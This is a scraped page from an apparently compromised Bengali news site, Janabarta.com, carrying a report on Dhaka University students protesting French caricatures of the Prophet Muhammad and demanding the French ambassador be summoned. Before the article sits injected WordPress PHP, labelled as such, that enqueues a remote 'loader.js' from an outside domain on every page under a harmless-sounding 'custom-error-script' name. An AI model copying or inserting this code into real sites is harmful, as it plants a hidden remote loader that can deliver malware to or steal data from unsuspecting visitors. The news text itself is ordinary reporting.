// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site মহানবীকে অবমাননা,ফরাসি রাষ্ট্রদূতকে তলবের দাবি ঢাবি শিক্ষার্থীদের - Janabarta.com

মহানবীকে অবমাননা,ফরাসি রাষ্ট্রদূতকে তলবের দাবি ঢাবি শিক্ষার্থীদের

নিজস্ব প্রতিবেদকঃ ফ্রান্সে রাষ্ট্রীয় পৃষ্ঠপোষকতায় বিশ্বনবী হযরত মুহাম্মদ (সা.)- এর ব্যঙ্গচিত্র প্রদর্শনের প্রতিবাদে ঢাকা বিশ্ববিদ্যালয়ের শিক্ষার্থীরা বাংলাদেশের প্রধানমন্ত্রীর নিন্দা প্রস্তাব ও বাংলাদেশে নিযুক্ত ফরাসি রাষ্ট্রদূতকে তলবের দাবি জানিয়েছেন।

রোববার রাজু ভাস্কর্যের পাদদেশে আয়োজিত ঢাবির সন্ত্রাসবিরোধী প্রতিবাদ সমাবেশে এ দাবি জানানো হয়। এতে অর্ধশতাধিক শিক্ষার্থী অংশ নেন।

সমাবেশে শিক্ষার্থীরা বলেন, কথা বলা ও মত প্রকাশের স্বাধীনতা সকলের আছে। কিন্তু মত প্রকাশের নামে কারো ধর্মীয় অনুভূতিতে আঘাত করার অধিকার কারও নেই। আমাদের কাছে মহানবীর প্রাধান্য জীবনের চেয়েও অধিক।

তারা আরও বলেন, ফ্রান্সে রাষ্ট্রীয় পৃষ্ঠপোষকতায় যে ব্যঙ্গচিত্র প্রদর্শনী হয়েছে তা অত্যন্ত ন্যক্কারজনক। মুসলিম প্রধান দেশ হিসেবে বাংলাদেশের প্রধানমন্ত্রীকে অবশ্যই ফ্রান্স সরকারের এ কর্মকাণ্ডের নিন্দা প্রস্তাব এবং ফরাসি রাষ্ট্রদূতকে তলব করে প্রতিবাদ জানাতে হবে।